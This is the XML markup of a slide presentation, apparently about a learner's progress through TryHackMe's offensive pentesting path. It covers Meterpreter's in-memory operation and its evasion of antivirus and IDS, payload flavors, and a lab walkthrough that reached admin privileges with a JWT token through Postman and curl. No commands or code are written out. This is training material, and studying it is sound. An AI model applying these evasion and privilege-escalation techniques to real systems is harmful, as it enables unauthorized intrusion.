            <a:pPr marL="914400" marR="0" lvl="2" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst/>
            </a:pP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a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3763855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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55"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6"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3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="60"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1"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7D52B8-F16E-CC7E-A958-4CCDDC02796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D31F9-9D5E-C2DF-83F7-BCF226A0D106}"/>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Meterpreter Overview &amp; Flavors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C03CCA-7046-9BF5-7899-007A35962A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4447308" y="591344"/>
            <a:ext cx="6906491" cy="5585619"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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What is Meterpreter?</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A Metasploit payload that runs in memory on the target system, avoiding disk-based detection.</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Encrypts communication between target and attacker, evading IPS/IDS detection.</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Antiviruses may detect its process but it still offers a level of stealth.</a:t>
            </a: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Meterpreter Flavors:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US"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Inline (Single):</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Sent in one step.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Staged:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Sent in two steps (stager first, payload next).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Different payloads based on target OS (Windows, Linux, Android, etc.).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399052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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="4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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45"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A7B73-3018-78DF-696F-9C40FA3C9B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D425C-67A9-1E4E-F341-D6468EF4F2CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Meterpreter Commands &amp; Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A0CBA4-0355-7C6C-158A-C150C9CD9B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41073432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727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564AC1-898F-40AD-F6CE-25344524A5DD}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 4" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B776F0E0-C52D-FBAF-6A8F-FDDC0AB52E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="3534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D196D77-C37D-4E55-8DB6-8E0F4DAE0547}"/>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chemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>INSTANT Machine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46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6FA3ED-A673-CD44-7DE8-A77D255F3EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="54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A42A904-C40D-0606-EA21-745B07AD8894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3410712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>It was a swagger documentation to all the endpoints in the server that the mobile app communicates with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a chat&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A171D3-24D8-68C2-EA67-51A1CF59F1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4901" y="1499056"/>
            <a:ext cx="6903720" cy="4300355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675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3A0C7-FA80-4F8E-8D68-FF766A975751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="639520"/>
            <a:ext cx="3429000" cy="1719072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="54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DDA4F5-DACE-6854-ADCB-FB93C98177E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="2807208"/>
            <a:ext cx="3429000" cy="3410712"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So basically I tried to deal with it by postman and added the JWT token to get the admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>privileages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> but it kept giving me internal server errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95632249-8EBD-E3D1-2C99-8E8A51B0F5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4296" y="1703069"/>
            <a:ext cx="6903720" cy="4514851"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41291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B5207E-0D59-DD0A-3B7D-CC7B7F766D2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AB601D-9222-D54B-75F9-01A809026B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="174032"/>
            <a:ext cx="10175631" cy="1111843"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36E201D6-F81E-B79F-51C0-DEF6C0FEC20F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008184" y="1459907"/>
            <a:ext cx="10175630" cy="767904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Aptos" panose="020B0004020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I used a normal curl command with the token added as an authorization header and it worked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30BF83AC-10E4-23E9-8BF2-A582E01FC9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154" y="2510971"/>
            <a:ext cx="10515595" cy="3250334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236695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92031" y="1040011"/>
            <a:ext cx="6179939" cy="3548857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="6958"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5583" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Journey Through TryHackMe's Offensive Pentesting Path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292031" y="4897438"/>
            <a:ext cx="6179939" cy="329208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2583"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1583" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292031" y="5473403"/>
            <a:ext cx="329108" cy="329108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 23151155"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298381" y="5479753"/>
            <a:ext cx="316408" cy="316408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5723930" y="5458024"/>
            <a:ext cx="1766788" cy="359966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2833"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>by ibram anwar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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91257" y="544413"/>
            <a:ext cx="6237486" cy="1234480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4833"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3875" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Introduction to Offensive Pentesting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3875" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691257" y="2297212"/>
            <a:ext cx="444302" cy="444302"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18671"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="182567"/>
          </a:solidFill>
          <a:ln w="7620">
            <a:solidFill>
              <a:srgbClr val="313E80"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829171" y="2371229"/>
            <a:ext cx="168374" cy="296268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2292" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2292" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333004" y="2297212"/>
            <a:ext cx="2676128" cy="308570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2417"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1917" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CFD0D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Medium" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Medium" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Comprehensive Skill Set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1917" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333005" y="2724249"/>
            <a:ext cx="5595739" cy="632023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
